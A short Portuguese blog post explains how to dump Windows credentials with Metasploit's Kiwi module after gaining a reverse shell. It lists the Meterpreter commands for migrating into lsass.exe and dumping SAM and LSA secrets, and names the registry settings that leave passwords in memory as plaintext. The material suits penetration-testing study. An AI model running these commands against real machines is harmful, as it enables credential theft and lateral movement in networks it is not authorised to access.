Módulo Kiwi - Dump Credentials
Depois de conseguir acesso a um servidor através de uma shell reversa, a próxima etapa é fazer a coleta de credenciais para iniciar a movimentação lateral.
Quando a shell reversa é estabelecida com o Metasploit, é possível usar o módulo Kiwi para fazer a coleta dos hashes de senha da máquina-alvo. Em ambientes windows, os hashes são armazenados no arquivo SAM localizado em %SYSTEMROOT%/System32/config/SAM
Na imagem abaixo é possível ver a conexão do IP 10.10.22.2 (atacante) porta 4545 com o 10.4.18.235 (alvo). Em seguida é feito a migração do processo lsass.exe com o comando:
migrate -N lsass.exe
A ação de "migrar" o processo lsass.exe é feito para mover o processo de um ambiente para outro (de um host para outro).
Na seguência, iniciamos o módulo Kiwi com o comando:
load kiwi
creds_all
E é necessário ser usuário SYSTEM na máquina para fazer a coleta, ou seja, é necessário ter feito a escalação de privilégio antes (se a conexão da shell não for privilegiada).
A coleta dos hashes de todas as contas que fizeram login na máquina-alvo pode ser feita com o comando:
lsa_dump_sam
lsa_dump_secrets
A syskey é a chave usada para criptografar a senha e gerar o hash.
O arquivo o SAM é encontrado apenas nas máquinas, isto é, no servidor Domain Controller, as credenciais são armazenadas no arquivo ntds.dit localizado em %SYSTEMROOT%\NTDS\ntds.dit
É possível encontrar senha em texto-claro nas máquinas windows que estão em um domínio? Sim, é possível.
As situações abaixo quando ocorrem permitem a máquina Windows armazenar a senha em texto-claro na memória.
[+] Se o domain controller está inalcansável, o kerberos mantém a senha em texto-claro na memória para logins futuros.
[+] Se o registro do WDigest for alterado para 1:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential
[+] Se o registro do CredSSP for alterado para Allow:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
[+] Se o registro CredSSP/tspkgs é alterado para Allow:
HKLM\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation
Comentários
Postar um comentário